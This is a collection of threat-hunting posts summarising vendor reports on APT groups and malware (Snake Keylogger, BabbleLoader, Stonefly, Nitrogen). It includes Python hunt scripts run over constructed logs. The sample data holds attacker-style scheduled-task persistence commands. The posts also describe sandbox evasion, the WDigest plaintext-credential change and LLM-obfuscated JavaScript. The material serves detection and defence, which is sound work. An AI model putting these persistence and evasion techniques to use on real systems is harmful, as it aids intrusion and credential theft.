#threatdetection

Good day everyone!

An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers, and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used the age-old technique of spear-phishing to gain initial access, with messages carrying various attachments that contained a legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.

As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!

Angry Likho: Old beasts in a new forest
securelist.com/angry-likho-apt

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday


Good day everyone!

Fortinet's FortiGuard Labs discovered a new variant of the #Snake keylogger, a.k.a. "404 Keylogger". According to the report, most of the detections from their "FortiSandbox" have come from China, Turkey, Indonesia, Taiwan, and Spain, but if you aren't from these countries, you may still be a target!

Behaviors (MITRE ATT&CK):
Persistence - TA0003:
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - After the malware is executed, it drops a copy of itself in the %Local_AppData%\supergroup directory and then copies itself to the %Startup% folder.

Defense Evasion - TA0005:
Process Injection: Process Hollowing T1055.012 - The malware injects itself into a legitimate .NET process, in this sample it was RegSvcs.exe. This allowed it to run within a trusted process to evade detection.

Command And Control - TA0011:
Application Layer Protocol: Web Protocols - T1071.001
Application Layer Protocol: Mail Protocols - T1071.003

The malware used multiple techniques to upload stolen credentials. The researchers observed SMTP, Telegram bots, and HTTP POST requests being used to transmit the data.

As usual, go check out the research for yourself to check out the details that I left out and support the good work! Enjoy and Happy Hunting!

FortiSandbox 5.0 Detects Evolving Snake Keylogger Variant
fortinet.com/blog/threat-resea

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Fortinet Blog · FortiSandbox 5.0 Detects Evolving Snake Keylogger Variant | FortiGuard Labs: Explore how FortiSandbox 5.0 detected this malware, the behavioral indicators it leveraged for identification, and Snake Keylogger's technique to evade detection and analysis.
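The three Snake Keylogger behaviours listed above translate directly into hunt logic. The block below is an added example, not code from the Fortinet report: it runs over constructed Sysmon-style process and file events and flags a process running from %Local_AppData%\supergroup, a file written to the user's Startup folder by such a process, and RegSvcs.exe launched from a user-writable path (a heuristic for the process-hollowing step). The event fields, host names and paths are constructed for the example.

```python
"""Hunt logic for the Snake Keylogger behaviours above (added example, not
from the Fortinet report). Event format and values are constructed."""
import re

# Constructed Sysmon-style events: process creations and file creations
EVENTS = [
    {"type": "process", "host": "ws01", "pid": 4120,
     "image": r"C:\Users\bob\AppData\Local\supergroup\invoice.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "file", "host": "ws01", "pid": 4120,
     "target": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\invoice.exe"},
    {"type": "process", "host": "ws01", "pid": 4188,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "parent": r"C:\Users\bob\AppData\Local\supergroup\invoice.exe"},
    # benign RegSvcs.exe launch from a developer tool, should not be flagged
    {"type": "process", "host": "ws02", "pid": 900,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe"},
]

SUPERGROUP = re.compile(r"\\AppData\\Local\\supergroup\\", re.I)
STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# Heuristic (assumption): user-writable locations a legitimate RegSvcs.exe parent should not live in
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.I)


def hunt(events):
    """Return a list of (host, rule, detail) findings for the three behaviours."""
    findings = []
    for e in events:
        if e["type"] == "process":
            if SUPERGROUP.search(e["image"]):
                findings.append((e["host"], "supergroup_dropper", e["image"]))
            if e["image"].lower().endswith("\\regsvcs.exe") and USER_WRITABLE.search(e["parent"]):
                findings.append((e["host"], "regsvcs_suspicious_parent", e["parent"]))
        elif e["type"] == "file" and STARTUP.search(e["target"]):
            # correlate the Startup-folder write with the process that performed it
            writer = next((p for p in events if p["type"] == "process"
                           and p["host"] == e["host"] and p["pid"] == e["pid"]), None)
            if writer and SUPERGROUP.search(writer["image"]):
                findings.append((e["host"], "startup_copy_from_supergroup", e["target"]))
    return findings


if __name__ == "__main__":
    for host, rule, detail in hunt(EVENTS):
        print(f"{host}: {rule} -> {detail}")
```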

Good day everyone, new Blizzard has dropped!

Microsoft's Threat Intelligence shares their research on a Russian state actor dubbed #SeashellBlizzard! Part of the GRU, they specialize in operations ranging from espionage to information operations and cyber-enabled disruptions, which have resulted in destructive attacks and manipulation of ICS. They have leveraged different types of malware, including #KillDisk, #FoxBlade, and #NotPetya.

Behavior Summary (With MITRE ATT&CK):
Initial Access - TA0001:
Exploit Public-Facing Application - T1190
Seashell Blizzard commonly exploited vulnerable public-facing infrastructure.

Persistence - TA0003:
Create or Modify System Process: Windows Service - T1543.003
Among other means of persistence, Seashell Blizzard created a system service.

Execution - TA0002:
Command and Scripting Interpreter: PowerShell - T1059.001
Command and Scripting Interpreter: Windows Command Shell - T1059.003
Seashell Blizzard abused both of these living-off-the-land binaries for multiple reasons and with multiple different parameters.

As always, there are WAAAAY too many technical details here, so go check it out yourself! Enjoy the read and Happy Hunting!

The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
microsoft.com/en-us/security/b

Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

Microsoft Security Blog · The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation: Microsoft is publishing for the first time our research into a subgroup within the Russian state actor Seashell Blizzard and its multiyear initial access operation, tracked by Microsoft Threat Intelligence as the “BadPilot campaign”. This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations.

🚀 Kunai pushes further integration with MISP!

This week, we've made significant progress in bridging Kunai with @misp to enhance threat intelligence sharing. Our focus has been on developing kunai-to-misp, a new tool available at github.com/kunai-project/pykun, which processes Kunai logs and creates MISP events to streamline collaboration.

With this, it is now possible to both update MISP from Kunai and feed Kunai from MISP using the misp-to-kunai tool. Here's a practical workflow example:

1️⃣ Analyze a #linux malware sample with Kunai Sandbox (github.com/kunai-project/sandb)
2️⃣ Use kunai-to-misp on the collected Kunai logs
3️⃣ (Optional) Review attributes' IDS flag to maximize detections and reduce false positives
4️⃣ Use misp-to-kunai to distribute the results across all Kunai endpoints

Additionally, we're leveraging MISP’s data model to craft meaningful MISP objects and relationships, offering a clear visual representation of events inside MISP.

🔗 Try it out and let us know what you think!

AI/LLMs in the Service of Criminals 👾

As we witness the evolution of adversarial AI techniques, one of the most concerning developments is the use of large language models (LLMs) to obfuscate malicious JavaScript code.

More details: unit42.paloaltonetworks.com/us

Unit 42 · Now You See Me, Now You Don’t: Using LLMs to Obfuscate Malicious JavaScript, by Lucas Hu

Corelight’s NOC team faced a unique challenge at Black Hat USA 2024—detecting SSHAMBLE, a new SSH scanner introduced by HD Moore. By tapping into existing logs and Zeek metadata, we identified the tool’s fingerprint in real-time.

What happened next?
✔️ Real-time detection.
✔️ Discovering threats using old logs. ✅✅
✔️ Zeek metadata making sense of encrypted traffic. 🔍

🔗 Head to the blog to learn more: corelight.com/blog/black-hat-u

Good day everyone!

Ryan R. at Intezer shares with us their work analyzing the #BabbleLoader, which is an "extremely evasive loader, packed with defensive mechanisms that is designed to bypass antivirus and sandbox environments to deliver stealers into memory".

There is a TON of analysis and intel here, so I am going to try and highlight the parts that I find significant and actionable!

Defense Evasion:
- The malware checks the installed graphics adapters to see if it is running in a sandboxed environment or not. This leverages the dxgi.dll which is the DirectX Graphics Infrastructure library.
- It checks the number of unique running processes on the machine by calling NtQuerySystemInformation. The magic number is 85 unique processes, with the assumption that a truly infected computer would have more running processes than a sandbox would.

Next Stage:
- The next stage involves a Donut loader, which the GitHub README describes as follows: "Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies." [1]
- The ultimate payloads in these examples were the WhiteSnake and Meduza Stealers.

Hunt opportunity:
In this case, because the Donut loader and other payloads involved use command and control as their communication, there is an opportunity to run an unstructured hunt for "new" or anomalous connections. The article also mentioned that the WhiteSnake stealer uses the TOR network for C2 which would involve the installation on the victim's machine, which is another opportunity to find something suspicious.

Well, I am SURE there is plenty of information that is critical to everyone else BUT that is why it is time for you to read it for yourself! Enjoy and Happy Hunting!

Babble Babble Babble Babble Babble Babble BabbleLoader
intezer.com/blog/research/babb

Supplemental [1]:
GitHub/TheWover/Donut
github.com/TheWover/donut

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday Cyborg Security, Now Part of Intel 471

Intezer · Babble Babble Babble Babble Babble Babble BabbleLoader: BabbleLoader: the annoyingly clever malware loader that jumbles, scrambles, and evades its way past modern defenses with frustrating ease.
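The "new or anomalous connections" hunt suggested in the post above can be made concrete with a simple baseline. The block below is an added example, not code from the Intezer write-up: it builds a per-host set of (process, destination) pairs from an earlier period and reports hunt-period connections that are new, either a process that never made network connections before or a known process reaching an unseen destination. All hosts, paths and addresses are constructed for the example.

```python
"""Baseline-driven hunt for new outbound connections (added example, not from
the Intezer write-up). Connection records are constructed for the example."""
from collections import defaultdict

# Constructed connection records: (host, process image, destination ip, destination port)
BASELINE = [
    ("ws01", r"C:\Program Files\Mozilla Firefox\firefox.exe", "203.0.113.10", 443),
    ("ws01", r"C:\Program Files\Mozilla Firefox\firefox.exe", "203.0.113.11", 443),
    ("ws01", r"C:\Windows\System32\svchost.exe", "203.0.113.20", 443),
]
HUNT = [
    ("ws01", r"C:\Program Files\Mozilla Firefox\firefox.exe", "203.0.113.10", 443),  # already seen
    ("ws01", r"C:\Windows\System32\svchost.exe", "198.51.100.7", 443),               # known process, new dest
    ("ws01", r"C:\Users\bob\AppData\Local\Temp\run.exe", "198.51.100.9", 8443),      # process never seen talking
]


def build_baseline(records):
    """Map (host, process) -> set of (ip, port) pairs observed in the baseline period."""
    seen = defaultdict(set)
    for host, proc, ip, port in records:
        seen[(host, proc.lower())].add((ip, port))
    return seen


def new_connections(baseline, hunt):
    """Return (host, process, ip, port, reason) for hunt-period connections absent from the baseline."""
    findings = []
    for host, proc, ip, port in hunt:
        key = (host, proc.lower())
        if key not in baseline:
            findings.append((host, proc, ip, port, "new_process_with_network"))
        elif (ip, port) not in baseline[key]:
            findings.append((host, proc, ip, port, "new_destination_for_process"))
    return findings


if __name__ == "__main__":
    for finding in new_connections(build_baseline(BASELINE), HUNT):
        print(finding)
```

Extend the baseline window and add an allow-list of known update or CDN destinations before using this on real telemetry, otherwise the first run is all noise.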

Happy Friday everyone!

A Joint Advisory from the National Security Agency, Federal Bureau of Investigation (FBI), Cyber National Mission Force, and the National Cyber Security Centre provides updates on the Russian Federation's Foreign Intelligence Service, or #SVR.

According to the advisory, #APT29 (a.k.a. Midnight Blizzard, Cozy Bear, and the Dukes) has targeted the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations. They aim to exploit software vulnerabilities for initial access and escalate privileges. They also utilize spearphishing campaigns, password spraying, and abuse of supply chain and trusted relationships. They also utilize custom malware and living-off-the-land (LOLBIN) techniques for multiple purposes.

The report includes a list of #CVEs that APT29 has been observed exploiting and attaches the vendor and product that are affected, with details that describe the vulnerability, along with a section of mitigations that your organization can take to increase your security posture.

If you are looking for behaviors that are attributed to APT29, look no further than the MITRE ATT&CK Matrix! This resource has collected historic #TTPs and behaviors and referenced them as well. So while you are working on hardening your environment you can also hunt for their activity as well! Enjoy and Happy Hunting!

Article Source:
Update on SVR Cyber Operations and Vulnerability Exploitation
ic3.gov/Media/News/2024/241010

Mitre source:
attack.mitre.org/groups/G0016/

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471

Happy Thursday everyone!

The Symantec Threat Hunter Team observed activity from the North Korean #Stonefly group (a.k.a. Andariel, #APT45, Silent Chollima, Onyx Sleet) and identified parts of their toolset, which include the #Nukebot backdoor, batch files that modify the registry key that is responsible for controlling if credentials are in plaintext or not (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest), and a list of open-source tools.

There were multiple ways that the adversary gained persistence which included some techniques I've discussed before: creating a .lnk file in the startup directory, creating a service, modifying the registry keys that control or execute items on startup, and scheduled tasks. Which makes me bust out the old but gold Hunt Package that covers that! But enjoy the article and Happy Hunting!

Stonefly: Extortion Attacks Continue Against U.S. Targets
symantec-enterprise-blogs.secu

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday

symantec-enterprise-blogs.security.com · Stonefly: Extortion Attacks Continue Against U.S. Targets: Attacks continue after indictment naming North Korean suspect.

Happy #DFIRDay!

The DFIR Report has released another detailed report that starts with #Nitrogen malware and ends with #BlackCat ransomware encrypting the files of the victim.

Something that really stood out about this attack was the Persistence technique that was observed. Now I am not going to hit you with the same "Run Registry Keys" and "Windows Startup directory" but it does involve scheduled tasks. And not just the existence of a scheduled task being created but MULTIPLE task creation attempts. Not only does the section highlight the "human element" that exists with cyber attacks, since there were multiple mistakes and typos, but makes you question how often this type of thing occurs in your environment. I know I stand a little outside of organizations and I only have a small window in, but I think that this many attempts from a single or multiple hosts seems like a red flag. In other words, don't just think about the technique, think about frequency and how often this might legitimately exist. Once you understand that, it is easier to find the abnormal! Enjoy the rest of the article and Happy Hunting!

Nitrogen Campaign Drops Sliver and Ends With BlackCat Ransomware
thedfirreport.com/2024/09/30/n

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday Cyborg Security, Now Part of Intel 471
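The post's point is that frequency, not just the technique, is the signal: one schtasks /create is routine, four attempts in a couple of minutes with typos is not. The block below is an added example, not code from The DFIR Report: it counts scheduled-task creation attempts per host in a sliding window and flags hosts with a burst. The log lines, hosts, users and thresholds are constructed for the example.

```python
"""Frequency hunt for repeated scheduled-task creation attempts (added example,
not from The DFIR Report). Log lines and thresholds are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed process-creation log: "<ISO time>|<host>|<user>|<command line>"
LOG = """\
2024-09-30T10:01:02|srv01|CORP\\jdoe|schtasks /create /tn Updater /tr C:\\temp\\u.exe /sc onlogon
2024-09-30T10:01:40|srv01|CORP\\jdoe|schtasks /create /tn Updater /tr C:\\temp\\u.exe /sc onlogin
2024-09-30T10:02:15|srv01|CORP\\jdoe|schtask /create /tn Updater /tr C:\\temp\\u.exe /sc onlogon
2024-09-30T10:03:01|srv01|CORP\\jdoe|schtasks /create /tn Updater /tr C:\\temp\\u.exe /sc onlogon /ru SYSTEM
2024-09-30T10:05:00|ws07|CORP\\svc_backup|schtasks /create /tn NightlyBackup /tr D:\\bk.bat /sc daily
2024-09-30T14:00:00|ws07|CORP\\svc_backup|schtasks /create /tn NightlyBackup2 /tr D:\\bk.bat /sc daily
"""


def is_task_creation(cmd):
    """Match schtasks /create, tolerating a misspelled binary name like 'schtask'."""
    c = cmd.strip().lower()
    return c.startswith(("schtasks", "schtask ")) and "/create" in c


def burst_hosts(log, window=timedelta(minutes=5), threshold=3):
    """Return {host: peak count} for hosts with >= threshold creation attempts inside any window."""
    attempts = defaultdict(list)
    for line in log.splitlines():
        ts, host, _user, cmd = line.split("|", 3)
        if is_task_creation(cmd):
            attempts[host].append(datetime.fromisoformat(ts))
    flagged = {}
    for host, times in attempts.items():
        recent = deque()  # timestamps inside the current sliding window
        for t in sorted(times):
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                flagged[host] = max(flagged.get(host, 0), len(recent))
    return flagged


if __name__ == "__main__":
    for host, count in burst_hosts(LOG).items():
        print(f"{host}: {count} scheduled-task creation attempts within 5 minutes")
```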

🔔 For those wondering how to gain visibility on their #Linux system for #ThreatDetection and #ThreatHunting:

Check out the Kunai Project! It's completely free and supports IoC-based detection, Yara rules, custom detection rules, and more.

A new release is available: github.com/kunai-project/kunai

GitHub Releases · kunai-project/kunai: Threat-hunting tool for Linux.